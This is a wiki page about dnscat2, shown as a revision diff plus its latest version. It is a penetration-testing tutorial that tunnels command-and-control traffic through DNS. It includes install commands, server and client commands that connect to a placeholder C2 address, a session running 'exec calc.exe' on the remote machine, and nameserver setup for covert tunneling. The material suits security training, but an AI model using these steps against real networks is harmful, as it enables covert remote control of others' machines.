Dnscat: Difference between revisions

From charlesreid1

No edit summary
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
Imagine the power of [[Netcat]], but with everything tunneled through DNS packets. Imagine the power!!!
=Overview=


Dnscat2 does precisely that: http://www.doctorchaos.com/dnscat2-dns-reverse-tunneling-thru-secure-networks/
==What is it?==


More detailed info: https://zeltser.com/c2-dns-tunneling/
dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. It works by running a dnscat2 server and a dnscat2 client, and having the two ends communicate via DNS queries.


Code on Github: https://github.com/iagox86/dnscat2
There are two ways of running dnscat2:


The dnscat2 software is run on a C2 server that listens for a client. The software is then run on a client, which attempts to connect to the C2 server and establish a session. Once a session is established, a reverse connection is created from the C2 server, which enables an attacker to run arbitrary commands on the remote client's machine.
* In "direct DNS" mode, the client can communicate with the attacker directly as if the attacker were a standard DNS server. This is the simplest setup, but in a more secure network, machines may be restricted to only run DNS queries using explicitly allow-listed DNS servers.


The C2 server should be a registered domain, and should be an authoritative DNS server, and the authoritative DNS server should be the same server running the dnscat2 server. To make a DNS server authoritative for your domain, you will inform the domain registrar of the authoritative DNS in the domain. There is often an option to do this in Domain Management/Domain Settings. Edit DNS Zone file, and add several records:
* In "proxy DNS" mode, the client and server can still communicate, but the DNS queries are proxied by another DNS server. This method requires a public DNS entry that points to the dnscat2 server. The client can then send and receive DNS queries to and from the dnscat2 server by using that public domain, and having the DNS queries handled by an intermediary DNS server.
* Add two A records <code>ns1</code> and <code>ns2</code> that point to the C2 server
 
* Add two DNS records with host <code>ns1</code> and <code>ns2</code> to point to n1.domain.com and n2.domain.com
==Installing==
 
<pre>
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
</pre>
 
 
=Usage=
 
 
==Direct DNS Mode==
 
==Running the server==
 
When you run the server, no arguments are required
 
<pre>
# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
</pre>
 
Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side:
 
<pre>
# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 12199
dnscat2>
</pre>
 
Now, you can connect to the particular interactive session with that number:
 
<pre>
dnscat2> session -i 12199
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 12199]> exec calc.exe
Sent request to execute
dnscat [command: 12199]>
</pre>
 
==Running the client==
 
On Linux:
 
<pre>
./dnscat2.rb --host 101.202.303.404
</pre>
 
On Windows:
 
<pre>
C:\Users\asdf\Desktop> dnscat2-win32.exe --host 101.202.303.404
</pre>
 
 
 
 
==Proxy DNS Mode==
 
 
===DNS Setup===
 
The C2 server should be a registered domain, and should be an authoritative DNS server, and the authoritative DNS server should be the same server running the dnscat2 server.
 
Here's how to set that up:
 
* Suppose you are using example.com as the domain
 
* Add two new A records that will be the nameserver subdomains, and will both point to the dnscat2 server IP address:
** <code>ns1.example.com</code>
** <code>ns2.example.com</code>
 
* Now you should inform the domain registrar that the authoritative DNS server for this domain is the dnscat2 server
** Set up the domain to use your own, custom nameservers
** Add the nameservers ns1.example.com and ns2.example.com
 
Give some time for settings to take effect.
 
Now when you run dnscat2 on the server, you specify example.com domain (instead of no argument), and on the server, you specify example.com domain (for --host flag, instead of host IP).
 
=Resources=
 
https://web.archive.org/web/20160311081612/https://www.doctorchaos.com/dnscat2-dns-reverse-tunneling-thru-secure-networks/
 
https://zeltser.com/c2-dns-tunneling/
 
Github: https://github.com/iagox86/dnscat2


Next, make sure the domain is set up to use your own, custom nameservers. Add the nameservers ns1.domain.com and ns2.domain.com). Give some time for settings to take effect.


Now when you run dnscat2 on either machine, you'll specify domain.com


=Flags=
=Flags=


{{KaliFlag}}
{{KaliFlag}}

Latest revision as of 14:29, 7 March 2022

Overview

What is it?

dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. It works by running a dnscat2 server and a dnscat2 client, and having the two ends communicate via DNS queries.

There are two ways of running dnscat2:

  • In "direct DNS" mode, the client can communicate with the attacker directly as if the attacker were a standard DNS server. This is the simplest setup, but in a more secure network, machines may be restricted to only run DNS queries using explicitly allow-listed DNS servers.
  • In "proxy DNS" mode, the client and server can still communicate, but the DNS queries are proxied by another DNS server. This method requires a public DNS entry that points to the dnscat2 server. The client can then send and receive DNS queries to and from the dnscat2 server by using that public domain, and having the DNS queries handled by an intermediary DNS server.

Installing

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install


Usage

Direct DNS Mode

Running the server

When you run the server, no arguments are required 

# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)

Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side: 

# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 12199
dnscat2>

Now, you can connect to the particular interactive session with that number: 

dnscat2> session -i 12199
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 12199]> exec calc.exe
Sent request to execute
dnscat [command: 12199]>

Running the client

On Linux: 

./dnscat2.rb --host 101.202.303.404

On Windows: 

C:\Users\asdf\Desktop> dnscat2-win32.exe --host 101.202.303.404



Proxy DNS Mode

DNS Setup

The C2 server should be a registered domain, and should be an authoritative DNS server, and the authoritative DNS server should be the same server running the dnscat2 server.

Here's how to set that up:

  • Suppose you are using example.com as the domain
  • Add two new A records that will be the nameserver subdomains, and will both point to the dnscat2 server IP address:
    • ns1.example.com
    • ns2.example.com
  • Now you should inform the domain registrar that the authoritative DNS server for this domain is the dnscat2 server
    • Set up the domain to use your own, custom nameservers
    • Add the nameservers ns1.example.com and ns2.example.com

Give some time for settings to take effect.

Now when you run dnscat2 on the server, you specify example.com domain (instead of no argument), and on the server, you specify example.com domain (for --host flag, instead of host IP).

Resources

https://web.archive.org/web/20160311081612/https://www.doctorchaos.com/dnscat2-dns-reverse-tunneling-thru-secure-networks/

https://zeltser.com/c2-dns-tunneling/

Github: https://github.com/iagox86/dnscat2


Flags


Defcon.png
Kali Linux
"The quieter you become, the more you are able to hear."

Penetration testing Linux distribution.


Kali  · Category:Kali

Kali/Wireless Reboot


Kali Software:

Kali Tools

Kali Top 10

Aircrack  · Wireshark  · John the Ripper  · Nmap  · Metasploit Framework

Dsniff  · Tcpdump  · Hydra  · Sqlmap  · Burpsuite  · Commix

Dirbuster  · Valgrind


Attack Workflow:

Kali/Workflow

1 Physical Attacks: Kali/Layer 1 Attacks

2 Data/MAC Attacks: Kali/Layer 2 Attacks

3 Network Attacks: Kali/Layer 3 Attacks

4 Transport Attacks: Kali/Layer 4 Attacks

5 Session Attacks: Kali/Layer 5 Attacks

6 Presentation Attacks: Kali/Layer 6 Attacks

7 Application Attacks: Kali/Layer 7 Attacks


Red Team Blue Team

Metasploitable - Red Team

Metasploitable - Blue Team


Networking:

Kali/Hotspot  · Kali/OpenVPN  · Kali/OpenVPN/Hotspot  · Kali/OpenVPN/PIA

Kali/IPv6


Booting:

Kali/Dual Boot OS X  · Kali/Live USB  · Kali/Persistent USB


Installing:

Kali/Installing  · Kali/Post Install  · Kali/Fixes


Kali on Raspberry Pi:

Kali Raspberry Pi  · Kali Raspberry Pi/Installing  · Kali Raspberry Pi/Headless  · Kali Raspberry Pi/Post-Install


Category:Security  · Category:Wireless  · Category:Passwords  · Category:Man in the Middle  · Category:Evil Twin

Flags  · Template:KaliFlag  · e




Retrieved from "https://charlesreid1.com/w/index.php?title=Dnscat&oldid=29212"